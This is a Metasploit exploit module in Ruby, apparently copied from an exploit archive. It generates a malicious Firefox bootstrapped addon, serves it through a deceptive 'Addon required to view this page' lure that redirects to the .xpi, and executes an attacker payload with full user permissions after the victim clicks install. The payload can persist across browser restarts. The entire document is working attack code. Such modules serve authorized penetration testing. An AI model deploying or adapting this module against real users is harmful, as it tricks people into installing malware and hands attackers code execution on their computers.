Firefox Bootstrap Addon (BackUp)

1. ##
2. # This module requires Metasploit: http://metasploit.com/download
3. # Current source: https://github.com/rapid7/metasploit-framework
4. ##
5.  
6. require 'msf/core'
7. require 'rex'
8. require 'rex/zip'
9.  
10. class Metasploit3 < Msf::Exploit::Remote
11.   Rank = ExcellentRanking
12.  
13.   include Msf::Exploit::Remote::HttpServer::HTML
14.   include Msf::Exploit::Remote::FirefoxAddonGenerator
15.  
16.   def initialize( info = {} )
17.     super( update_info( info,
18.       'Name'          => 'Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution',
19.       'Description'   => %q{
20.           This exploit dynamically creates a .xpi addon file.
21.         The resulting bootstrapped Firefox addon is presented to
22.         the victim via a web page. The victim's Firefox browser
23.        will pop a dialog asking if they trust the addon.
24.  
25.        Once the user clicks "install", the addon is installed and
26.        executes the payload with full user permissions. As of Firefox
27.        4, this will work without a restart as the addon is marked to
28.        be "bootstrapped". As the addon will execute the payload after
29.        each Firefox restart, an option can be given to automatically
30.        uninstall the addon once the payload has been executed.
31.      },
32.      'License'       => MSF_LICENSE,
33.      'Author'        => [ 'mihi', 'joev' ],
34.      'References'    =>
35.        [
36.          [ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],
37.          [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]
38.        ],
39.      'DisclosureDate' => 'Jun 27 2007'
40.    ))
41.  end
42.  
43.  def on_request_uri(cli, request)
44.    if request.uri.match(/\.xpi$/i)
45.      # browser has navigated to the .xpi file
46.      print_status("Sending xpi and waiting for user to click 'accept'...")
47.      if not xpi = generate_addon_xpi(cli)
48.        print_error("Failed to generate the payload.")
49.        send_not_found(cli)
50.      else
51.        send_response(cli, xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
52.      end
53.    else
54.      # initial browser request
55.      # force the user to access a directory-like URL
56.      if not request.uri.match(/\/$/)
57.        print_status("Redirecting request." )
58.        send_redirect(cli, "#{get_resource}/")
59.      else
60.        # user has navigated
61.        print_status("Sending response HTML." )
62.        send_response_html(cli, generate_html)
63.      end
64.    end
65.  
66.    handler(cli)
67.  end
68.  
69.  def generate_html
70.    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
71.    html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|
72.    html << %Q|<script>window.location.href="addon.xpi";</script>\n|
73.    html << %Q|</body></html>|
74.    return html
75.  end
76. end